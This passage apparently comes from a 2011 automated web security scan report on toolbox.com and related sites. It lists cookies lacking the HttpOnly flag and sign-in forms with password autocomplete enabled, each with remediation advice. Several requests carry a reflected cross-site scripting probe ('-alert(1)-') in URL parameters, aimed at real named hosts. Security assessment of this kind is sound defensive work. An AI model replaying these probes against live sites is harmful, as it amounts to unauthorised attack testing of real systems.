GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68626 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Two Old Pal ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66046 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Venture and ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81197 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Why Should ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&opi_o=5 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 39817 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: joinedfrom=title=Future States&url=http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&origin=5; domain=.toolbox.com; expires=Wed, 09-Feb-2011 14:47:17 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Register wi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jobs/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40888 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Jobs </tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trd/885101 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 223 Content-Type: text/html; charset=utf-8 Location: http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR IND UNI" Set-Cookie: EREF=dest=http%3a%2f%2fwindows.ittoolbox.com%2fresearch%2fwindows-7-deployment-an-insiders-guide-23009%3fr%3dOnlinePostingReminder&source=&rid=885101; domain=.toolbox.com; expires=Mon, 26-Jan-2015 14:46:39 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder">here</a>. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243<ype=JSCR&lname=560x350v1&url=http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: links.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object Moved Connection: close Date: Wed, 26 Jan 2011 14:55:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: CP="CAO DSP COR CURa " Location: http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html Content-Type: text/html Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:49:31 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/ Location: http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&pccr=true&vidn=26A01A3D851D2B4A-60000137A054F13C&&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Tue, 25 Jan 2011 14:49:31 GMT Last-Modified: Thu, 27 Jan 2011 14:49:31 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www389 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/TLBXittoolbox/technology/1%7BTIME_DATE_STAMP%7D@Top1 HTTP/1.1 Host: oasc05134.247realmedia.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW8003BLsABpSl
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:49:29 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 451 Content-Type: application/x-javascript Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=4TIUB; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
cae_browser=desktop; path=/; domain=.netapp.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: www.netapp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT X-Server-Name: dv-c1-r1-u14-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 26 Jan 2011 14:57:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com Content-Length: 104728
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/ Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Wed, 26 Jan 2011 14:57:08 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cringely/pulpit/ HTTP/1.1 Host: www.pbs.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:09 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:12 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79300 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL:
http://cio.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70865 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:19 GMT Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/blogs/
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /blogs/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85344 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:21 GMT Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/directory/
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/documents/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /documents/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28204 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/events/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /events/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 38997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:32 GMT Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/groups/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 131235 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:23 GMT Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/research/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /research/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 96466 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /subscriptions/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 27989 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:33 GMT Connection: close
The page contains a form with the following action URL:
http://cloud.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56007 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:35 GMT Connection: close
The page contains a form with the following action URL:
http://crm.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82725 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
The page contains a form with the following action URL:
http://database.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84329 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:38 GMT Connection: close
The page contains a form with the following action URL:
http://datacenter.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60090 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:41 GMT Connection: close
The page contains a form with the following action URL:
http://datawarehouse.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
